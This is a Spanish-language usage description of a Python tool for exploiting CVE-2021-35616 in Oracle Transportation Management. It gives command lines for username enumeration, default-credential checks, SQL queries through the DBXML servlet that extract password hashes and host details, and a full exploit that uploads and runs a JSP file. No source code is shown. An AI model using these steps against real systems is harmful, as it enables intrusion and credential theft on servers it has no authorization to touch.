
Herramienta Python para explotar CVE-2021-35616
Herramienta en Python para explotar CVE-2021-35616
El script funciona por módulos, los cuales implementé en el siguiente orden:
► Enumeración de nombres de usuario
► Búsqueda de credenciales por defecto
► Ejecución de una consulta SQL usando el servlet DBXML
► Explotación completa y ejecución de JSP
La sintaxis del script es la siguiente:
.\OracleOTM.py {módulo} {archivo TXT de hosts} {parámetros adicionales}
Enumeración de nombres de usuario: .\OracleOTM.py enum {archivo TXT de hosts} -u users.txt
Búsqueda de credenciales por defecto: .\OracleOTM.py default {archivo TXT de hosts}
Ejecutar una consulta SQL usando el servlet DBXML: .\OracleOTM.py query {archivo TXT de hosts} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"
También preparé algunas consultas predefinidas que encontré útiles; puedes acceder a ellas directamente, de la siguiente manera:
.\OracleOTM.py query {archivo TXT de hosts} -uq EBS.ADMIN -pq Aa123123 -q os
OS – Extraer el sistema operativo del servidor
Osuser – Extraer el usuario del SO que ejecuta la BD
Hostname – Nombre del host del servidor de BD
Hostip – Dirección IP del servidor de BD
Passwords – Extrae los usuarios de OTM y sus contraseñas hasheadas
Oraversion – La versión de la BD
Dbusershash – Los hashes de contraseñas de los usuarios de la BD
Dbfileslocation – La ubicación de los archivos de la BD en el SO
Explotación completa y ejecución de JSP: .\OracleOTM.py exploit {archivo TXT de hosts} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"